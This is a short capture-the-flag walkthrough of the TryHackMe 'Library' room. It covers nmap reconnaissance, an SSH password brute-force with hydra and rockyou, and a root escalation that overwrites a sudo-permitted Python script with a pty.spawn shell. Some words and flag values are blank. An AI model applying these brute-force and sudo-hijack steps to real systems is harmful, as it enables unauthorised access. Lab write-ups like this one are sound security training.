TryHackMe Walkthrough :- Library

boot2root machine for FIT and bsides guatemala CTF.

This is the write up for the room Library on TryHackMe website you can access it from here.

This room involves , using python payload for , and playing around with the permission that a low-privileged user has.

Prerequisites

Before deploying the machine make sure you have you VPN ready.

Now will deploy the machine after the VPN is deployed.

Now that the machine is booted we will start Reconnaissance.

Reconnaissance

Running a scan to list out all the open ports and services.

Command :- nmap -sC -sV -p- — min-rate=10000 -oN nmap <Target Ip>

We see that we have 2 open ports 22 i.e SSH and 80 i.e HTTP.

It means there is a on port 80.

After checking the entire blog, we got to know the name of the user

Now I tried brute-forcing the password with hydra.

Command :-hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://<Target_IP> -t 4

login:-

password:-

I logged in with SSH using the login and password which was bruteforced.

ssh meliodas@10.10.42.159

Looking around and found the first flag i.e. user.txt.

We got the user flag and completed the first part of our task which was to get the user flag.

user flag:-

Privilege escalation

Checking for the permission we have.

Command :- sudo -l

To check the user got which application to run as a privileged user(). We see that user meliodas can run a file called bak.py using python, but when I tried to run it, it gave an error and said permission was denied.

So, I deleted the file & re-create it with spawn using python. And then ran that bak.py again which gave me

rm /home/meliodas/bak.py

echo ‘import pty; pty.spawn(“/bin/sh”)’ > /home/meliodas/bak.py

sudo python /home/meliodas/bak.py

Now we will find the root flag.

We got our root flag and completed this box successfully.

root flag:-

If you found this helpful please do leave a clap.

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.